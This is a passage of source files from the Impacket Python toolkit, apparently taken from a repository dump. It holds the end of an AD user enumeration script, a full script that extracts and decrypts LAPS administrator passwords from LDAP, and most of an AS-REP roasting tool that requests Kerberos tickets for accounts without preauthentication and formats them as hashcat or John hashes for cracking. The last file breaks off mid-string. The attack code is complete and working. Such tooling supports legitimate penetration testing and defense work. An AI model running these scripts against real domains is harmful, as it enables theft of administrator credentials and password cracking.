self.__colLen = [20, 30, 19, 19]\n self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def processRecord(self, item):\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n return\n sAMAccountName = ''\n pwdLastSet = ''\n mail = ''\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # User Account\n sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'mail':\n mail = str(attribute['vals'][0])\n\n print((self.__outputFormat.format(*[sAMAccountName, mail, pwdLastSet, lastLogon])))\n except Exception as e:\n logging.debug(\"Exception\", exc_info=True)\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n def run(self):\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n logging.info('Querying %s for information about domain.' % self.__target)\n # Print header\n print((self.__outputFormat.format(*self.__header)))\n print((' '.join(['-' * itemLen for itemLen in self.__colLen])))\n\n # Building the search filter\n if self.__all:\n searchFilter = \"(&(sAMAccountName=*)(objectCategory=user)\"\n else:\n searchFilter = \"(&(sAMAccountName=*)(mail=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))\" % UF_ACCOUNTDISABLE\n\n if self.__requestUser is not None:\n searchFilter += '(sAMAccountName:=%s))' % self.__requestUser\n else:\n searchFilter += ')'\n\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n sc = ldap.SimplePagedResultsControl(size=100)\n ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName', 'pwdLastSet', 'mail', 'lastLogon'],\n sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecord)\n except ldap.LDAPSearchError:\n raise\n\n ldapConnection.close()\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print((version.BANNER))\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Queries target domain for users data\")\n\n parser.add_argument('target', action='store', help='domain[/username[:password]]')\n parser.add_argument('-user', action='store', metavar='username', help='Requests data for specific user ')\n parser.add_argument('-all', action='store_true', help='Return all users, including those with no email '\n 'addresses and disabled accounts. When used with -user it '\n 'will return user\\'s info even if the account is disabled')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = GetADUsers(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/GetLAPSPassword.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will gather data about the domain's computers and their LAPS/LAPSv2 passwords.\n# Initial formatting for this tool came from the GetADUsers.py example script.\n#\n# Author(s):\n# Thomas Seigneuret (@zblurx)\n# Tyler Booth (@dru1d-foofus)\n#\n# Reference for:\n# LDAP\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom datetime import datetime\nfrom impacket import version\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.epm import hept_map\nfrom impacket.dcerpc.v5.gkdi import MSRPC_UUID_GKDI, GkdiGetKey, GroupKeyEnvelope\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY\nfrom impacket.dpapi_ng import EncryptedPasswordBlob, KeyIdentifier, compute_kek, create_sd, decrypt_plaintext, unwrap_cek\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.ldap import ldap, ldapasn1\nfrom pyasn1.codec.der import decoder\nfrom pyasn1_modules import rfc5652\nimport argparse\nimport json\nimport logging\nimport sys\n\nclass GetLAPSPassword:\n @staticmethod\n def printTable(items, header, outputfile):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n print(outputFormat.format(*header))\n print(' '.join(['-' * itemLen for itemLen in colLen]))\n for row in items:\n print(outputFormat.format(*row))\n \n if outputfile:\n with open(outputfile, 'w') as file:\n outputFormat_file = '\\t'.join(['{%d:%ds}' % (num, width) for num, width in enumerate(colLen)]) # Added tab delimited output for files\n file.write(outputFormat_file.format(*header) + \"\\n\")\n for row in items:\n file.write((outputFormat_file.format(*row)).strip() + \"\\n\") # Removed extraneous field to clean up output saved to a file\n\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__target = None\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n self.__targetComputer = cmdLineOptions.computer\n self.__outputFile = cmdLineOptions.outputfile\n self.__ldaps_flag = cmdLineOptions.ldaps_flag\n self.__KDSCache = {}\n\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n def getLAPSv2Decrypt(self, rawEncryptedLAPSBlob):\n try:\n encryptedLAPSBlob = EncryptedPasswordBlob(rawEncryptedLAPSBlob)\n parsed_cms_data, remaining = decoder.decode(encryptedLAPSBlob['Blob'], asn1Spec=rfc5652.ContentInfo())\n enveloped_data_blob = parsed_cms_data['content']\n parsed_enveloped_data, _ = decoder.decode(enveloped_data_blob, asn1Spec=rfc5652.EnvelopedData())\n recipient_infos = parsed_enveloped_data['recipientInfos']\n kek_recipient_info = recipient_infos[0]['kekri']\n kek_identifier = kek_recipient_info['kekid'] \n key_id = KeyIdentifier(bytes(kek_identifier['keyIdentifier']))\n tmp,_ = decoder.decode(kek_identifier['other']['keyAttr'])\n sid = tmp['field-1'][0][0][1].asOctets().decode(\"utf-8\") \n target_sd = create_sd(sid)\n laps_enabled = True\n except Exception as e:\n logging.error('Cannot unpack msLAPS-EncryptedPassword blob due to error %s' % str(e))\n # Check if item is in cache\n if key_id['RootKeyId'] in self.__KDSCache:\n gke = self.__KDSCache[key_id['RootKeyId']]\n else:\n # Connect on RPC over TCP to MS-GKDI to call opnum 0 GetKey \n stringBinding = hept_map(destHost=self.__target, remoteIf=MSRPC_UUID_GKDI, protocol = 'ncacn_ip_tcp')\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n if hasattr(rpctransport, 'set_credentials'):\n rpctransport.set_credentials(username=self.__username, password=self.__password, domain=self.__domain, lmhash=self.__lmhash, nthash=self.__nthash)\n if self.__doKerberos:\n rpctransport.set_kerberos(self.__doKerberos, kdcHost=self.__target)\n if self.__kdcIP is not None:\n rpctransport.setRemoteHost(self.__kdcIP)\n rpctransport.setRemoteName(self.__target)\n\n dce = rpctransport.get_dce_rpc()\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n logging.debug(\"Connecting to %s\" % stringBinding)\n try:\n dce.connect()\n except Exception as e:\n logging.error(\"Something went wrong, check error status => %s\" % str(e))\n return laps_enabled\n logging.debug(\"Connected\")\n try:\n dce.bind(MSRPC_UUID_GKDI)\n except Exception as e:\n logging.error(\"Something went wrong, check error status => %s\" % str(e))\n return laps_enabled\n logging.debug(\"Successfully bound\")\n\n\n logging.debug(\"Calling MS-GKDI GetKey\")\n resp = GkdiGetKey(dce, target_sd=target_sd, l0=key_id['L0Index'], l1=key_id['L1Index'], l2=key_id['L2Index'], root_key_id=key_id['RootKeyId'])\n # Unpack GroupKeyEnvelope\n gke = GroupKeyEnvelope(b''.join(resp['pbbOut']))\n self.__KDSCache[gke['RootKeyId']] = gke\n\n kek = compute_kek(gke, key_id)\n enc_content_parameter = bytes(parsed_enveloped_data[\"encryptedContentInfo\"][\"contentEncryptionAlgorithm\"][\"parameters\"])\n iv, _ = decoder.decode(enc_content_parameter)\n iv = bytes(iv[0])\n \n cek = unwrap_cek(kek, bytes(kek_recipient_info['encryptedKey']))\n return decrypt_plaintext(cek, iv, remaining)\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def run(self):\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, self.__ldaps_flag)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n\n # Building the search filter\n searchFilter = \"(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))\" # Default search filter value\n if self.__targetComputer is not None:\n searchFilter += '(name=' + self.__targetComputer + ')'\n searchFilter += \")\"\n\n try:\n # Microsoft Active Directory set an hard limit of 1000 entries returned by any search\n paged_search_control = ldapasn1.SimplePagedResultsControl(criticality=True, size=1000)\n\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['msLAPS-EncryptedPassword', 'msLAPS-PasswordExpirationTime', 'msLAPS-Password', 'sAMAccountName', \\\n 'ms-Mcs-AdmPwdExpirationTime', 'ms-MCS-AdmPwd'],\n searchControls=[paged_search_control])\n\n except ldap.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n # We should never reach this code as we use paged search now\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n resp = e.getAnswers()\n pass\n else:\n raise\n\n entries = []\n \n logging.debug('Total of records returned %d' % len(resp))\n\n if len(resp) == 0:\n if self.__targetComputer is not None:\n logging.error('%s$ not found in LDAP.' % self.__targetComputer)\n else:\n logging.error(\"No valid entry in LDAP\")\n return \n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n try:\n sAMAccountName = None\n lapsPasswordExpiration = None\n lapsUsername = None\n lapsPassword = None\n lapsv2 = False\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n if str(attribute['type']) == 'msLAPS-EncryptedPassword':\n lapsv2 = True\n plaintext = self.getLAPSv2Decrypt(bytes(attribute['vals'][0]))\n r = json.loads(plaintext[:-18].decode('utf-16le'))\n # timestamp = r[\"t\"]\n lapsUsername = r[\"n\"]\n lapsPassword = r[\"p\"]\n elif str(attribute['type']) == 'ms-Mcs-AdmPwdExpirationTime' or str(attribute['type']) == 'msLAPS-PasswordExpirationTime':\n if str(attribute['vals'][0]) != '0':\n lapsPasswordExpiration = datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))).strftime('%Y-%m-%d %H:%M:%S')\n elif str(attribute['type']) == 'ms-Mcs-AdmPwd':\n lapsPassword = attribute['vals'][0].asOctets().decode('utf-8')\n if sAMAccountName is not None and lapsPassword is not None:\n entry = [sAMAccountName,lapsUsername, lapsPassword, lapsPasswordExpiration, str(lapsv2)]\n entry = [element if element is not None else 'N/A' for element in entry]\n entries.append(entry)\n except Exception as e:\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(entries) == 0:\n if self.__targetComputer is not None:\n logging.error(\"No LAPS data returned for %s\" % self.__targetComputer)\n else:\n logging.error(\"No LAPS data returned\")\n return \n \n self.printTable(entries,['Host','LAPS Username','LAPS Password','LAPS Password Expiration', 'LAPSv2'], self.__outputFile)\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print((version.BANNER))\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Extract LAPS passwords from LDAP\")\n\n parser.add_argument('target', action='store', help='domain[/username[:password]]')\n parser.add_argument('-computer', action='store', metavar='computername', help='Target a specific computer by its name')\n\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-outputfile', '-o', action='store', help='Outputs to a file.')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CcnAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n \n group.add_argument('-ldaps', dest='ldaps_flag', action=\"store_true\", help='Enable LDAPS (LDAP over SSL). '\n 'Required when querying a Windows Server 2025'\n 'domain controller with LDAPS enforced.')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = GetLAPSPassword(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))" }, { "path": "examples/GetNPUsers.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will attempt to list and get TGTs for those users that have the property\n# 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).\n# For those users with such configuration, a John The Ripper output will be generated so\n# you can send it for cracking.\n#\n# Original credit for this technique goes to @harmj0y:\n# https://blog.harmj0y.net/activedirectory/roasting-as-reps/\n# Related work by Geoff Janjua:\n# https://www.exumbraops.com/layerone2016/party\n#\n# For usage instructions run the script with no parameters.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport logging\nimport random\nimport sys\nfrom binascii import hexlify\n\nfrom pyasn1.codec.der import decoder, encoder\nfrom pyasn1.type.univ import noValue\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.krb5 import constants\nfrom impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter\nfrom impacket.krb5.kerberosv5 import sendReceive, KerberosError\nfrom impacket.krb5.types import KerberosTime, Principal\nfrom impacket.ldap import ldap, ldapasn1\n\n\nclass GetUserNoPreAuth:\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n print(outputFormat.format(*header))\n print(' '.join(['-' * itemLen for itemLen in colLen]))\n\n # And now the rows\n for row in items:\n print(outputFormat.format(*row))\n\n def __init__(self, username, password, domain, cmdLineOptions):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__target = None\n self.__lmhash = ''\n self.__nthash = ''\n self.__no_pass = cmdLineOptions.no_pass\n self.__outputFileName = cmdLineOptions.outputfile\n self.__outputFormat = cmdLineOptions.format\n self.__usersFile = cmdLineOptions.usersfile\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n self.__requestTGT = cmdLineOptions.request\n #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def getTGT(self, userName, requestPAC=True):\n\n clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n asReq = AS_REQ()\n\n domain = self.__domain.upper()\n serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n pacRequest = KERB_PA_PAC_REQUEST()\n pacRequest['include-pac'] = requestPAC\n encodedPacRequest = encoder.encode(pacRequest)\n\n asReq['pvno'] = 5\n asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)\n\n asReq['padata'] = noValue\n asReq['padata'][0] = noValue\n asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)\n asReq['padata'][0]['padata-value'] = encodedPacRequest\n\n reqBody = seq_set(asReq, 'req-body')\n\n opts = list()\n opts.append(constants.KDCOptions.forwardable.value)\n opts.append(constants.KDCOptions.renewable.value)\n opts.append(constants.KDCOptions.proxiable.value)\n reqBody['kdc-options'] = constants.encodeFlags(opts)\n\n seq_set(reqBody, 'sname', serverName.components_to_asn1)\n seq_set(reqBody, 'cname', clientName.components_to_asn1)\n\n if domain == '':\n raise Exception('Empty Domain not allowed in Kerberos')\n\n reqBody['realm'] = domain\n\n now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)\n reqBody['till'] = KerberosTime.to_asn1(now)\n reqBody['rtime'] = KerberosTime.to_asn1(now)\n reqBody['nonce'] = random.getrandbits(31)\n\n supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)\n\n seq_set_iter(reqBody, 'etype', supportedCiphers)\n\n message = encoder.encode(asReq)\n\n try:\n r = sendReceive(message, domain, self.__kdcIP)\n except KerberosError as e:\n if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:\n # RC4 not available, OK, let's ask for newer types\n supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),\n int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)\n seq_set_iter(reqBody, 'etype', supportedCiphers)\n message = encoder.encode(asReq)\n r = sendReceive(message, domain, self.__kdcIP)\n else:\n raise e\n\n # This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the\n # 'Do not require Kerberos preauthentication' set\n try:\n asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]\n except:\n # Most of the times we shouldn't be here, is this a TGT?\n asRep = decoder.decode(r, asn1Spec=AS_REP())[0]\n else:\n # The user doesn't have UF_DONT_REQUIRE_PREAUTH set\n raise Exception('User %s doesn\\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)\n\n # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.\n if self.__outputFormat == 'john':\n # Check what type of encryption is used for the enc-part data\n # This will inform how the hash output needs to be formatted\n if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:\n return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,\n hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),\n hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())\n else:\n return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,\n hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),\n hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())\n \n # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.\n else:\n # Check what type of encryption is used for the enc-part data\n # This will inform how the hash output needs to be formatted\n if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:\n return '$krb5asrep$%d$%s$%s$%s$%s' % (asRep['enc-part']['etype'], clientName, domain,\n hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode(),\n hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode())\n else:\n return '$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'], clientName, domain,\n hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),\n hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())\n\n @staticmethod\n def outputTGT(entry, fd=None):\n print(entry)\n if fd is not None:\n fd.write(entry + '\\n')\n\n def run(self):\n if self.__usersFile:\n self.request_users_file_TGTs()\n return\n\n # Are we asked not to supply a password?\n if self.__doKerberos is False and self.__no_pass is True:\n # Yes, just ask the TGT and exit\n logging.info('Getting TGT for %s' % self.__username)\n entry = self.getTGT(self.__username)\n self.request_multiple_TGTs([self.__username])\n return\n\n try:\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n except ldap.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') < 0:\n # Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled)\n logging.info('Cannot authenticate %s, getting its TGT' % self.__username)\n entry = self.getTGT(self.__username)\n self.request_multiple_TGTs([self.__username]) \n return\n\n # Building the search filter\n searchFilter = \"(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))\" % \\\n (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)\n\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n if str(e).find('NTLMAuthNegotiate') >= 0:\n logging.critical(\"NTLM negotiation failed. Probably NTLM is disabled. Try to use Kerberos \"\n \"authentication instead.\")\n else:\n if self.__kdcIP is not None and self.__kdcHost is not None:\n logging.critical(\"If the credentials are valid, check the hostname and IP address of KDC. They \"\n \"must match exactly each other\")\n raise\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(answers)>0:\n self.printTable(answers, header=[ \"Name\", \"MemberOf\", \"PasswordLastSet\", \"LastLogon\", \"UAC\"])\n print('\\n\\n')\n\n if self.__requestTGT is True:\n usernames = [answer[0] for answer in answers]\n self.request_multiple_TGTs(usernames)\n\n else:\n print(\"No entries found!\")\n\n def request_users_file_TGTs(self):\n with open(self.__usersFile) as fi:\n usernames = [line.strip() for line in fi]\n\n self.request_multiple_TGTs(usernames)\n\n def request_multiple_TGTs(self, usernames):\n if self.__outputFileName is not None:\n fd = open(self.__outputFileName, 'w+')\n else:\n fd = None\n for username in usernames:\n try:\n entry = self.getTGT(username)\n self.outputTGT(entry, fd)\n except Exception as e:\n logging.error('%s' % str(e))\n if fd is not None:\n fd.close()\n\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Queries target domain for users with \"\n \"'Do not require Kerberos preauthentication' set and export their TGTs for cracking\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]]')\n parser.add_argument('-request', action='store_true', default=False, help='Requests TGT for users and output them '\n 'in JtR/hashcat format (default False)')\n parser.add_argument('-outputfile', action='store',\n help='Output filename to write ciphers in JtR/hashcat format')\n\n parser.add_argument('-format', choices=['hashcat', 'john'], default='hashcat',\n help='format to save the AS_REQ of users without pre-authentication. Default is hashcat')\n\n parser.add_argument('-usersfile', help='File with user per line to test')\n\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n\n if len(sys.argv)==1:\n parser.print_help()\n print(\"\\nThere are a few modes for using this script\")\n print(\"\\n1. Get a TGT for a user:\")\n print(\"\\n\\tGetNPUsers.py contoso.com/john.doe -no-pass\")\n print(\"\\nFor this operation you don\\'t need john.doe\\'s password. It is important tho, to specify -no-pass in the script, \"\n \"\\notherwise a badpwdcount entry will be added to the 